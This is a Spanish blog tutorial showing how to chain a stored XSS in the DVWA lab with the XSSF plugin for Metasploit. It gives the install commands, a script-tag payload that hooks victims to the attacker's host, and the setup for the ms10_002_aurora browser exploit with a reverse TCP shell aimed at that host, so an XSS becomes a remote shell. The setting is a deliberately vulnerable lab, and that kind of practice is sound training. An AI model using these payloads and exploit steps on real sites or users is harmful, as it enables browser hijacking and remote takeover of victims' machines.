En el siguiente post, vamos a utilizar el framework XSSF con Metasploit, que nos permitirá atacar a una víctima con un simple XSS.
XSSF es un framework, creado por Ludovic Courgnaud, que nos permite “administrar” víctimas de XSS genéricos y realizar posteriores ataques, así como mantener el enlace para futuros ataques. Podemos encontrar una descripción más detallada del framework aquí.
Jugando con XSSF
Para realizar estas pruebas vamos a utilizar el DVWA, un framework para testing de vulnerabilidades web, instalado sobre una VM Windows XP y nuestro Backtrack 4 R2.
Lo primero que vamos a hacer es descargar el XSSF framework desde aquíy descomprimirlo en nuestro directorio de metasploit, luego iniciamos el framework:
# Instalamos XSSF en Metasploit cd /opt/metasploit/msf3 wget http://www.metasploit.com/redmine/attachments/596/XSSF.zip unzip XSSF.zip cd XSSF cp -r data/ lib/ modules/ plugins/ ../ # Iniciamos Metasploit y cargamos el XSSF msfconsole load XSSF
Ahora vamos a DVWA, a la pestaña XSS stored, con el DVWA Security en “Low” e insertamos el siguiente XSS:
<
script src=”http://IP_BACKTRACK:8888/loop?interval=5”></script>Si todo funcionó bien, deberá quedar registrado nuestro nombre y el comentario en blanco.Ahora, desde nuestra VM Windows XP, ingresamos a DVWA, ponemos el DVWA Security en “Low” y vamos a la pestaña XSS stored. Al momento de ingresar nuestro XSS entrará en acción 😉
Regresamos a nuestra consola de metasploit y vemos las víctimas que tenemos disponibles con el comando «xssf_victims»:
Si queremos obtener más información acerca de alguna víctima, ingresamos el siguiente comando «xssf_information victimID»:Ahora ya podremos hacer varias cosas con la víctima, por ejemplo enviarle un popup:use auxiliary/xssf/alert set VictimIDs 2 set AlertMessage "Game Over"También podremos lanzar un exploit contra el navegador para obtener una shell en el sistema:use exploit/windows/browser/ms10_002_aurora set SRVPORT 80 set PAYLOAD windows/shell/reverse_tcp set LHOST IP_BACKTRACK set URIPATH dvwa/vulnerabilities/xss_s/Vemos que job nos creo, el id de la victima y luego lanzamos el exploit desde el XSSF:jobs xssf_active_victims xssf_exploit victimID jobIDEspero que les haya gustado mi primer post! 🙂
Articulo: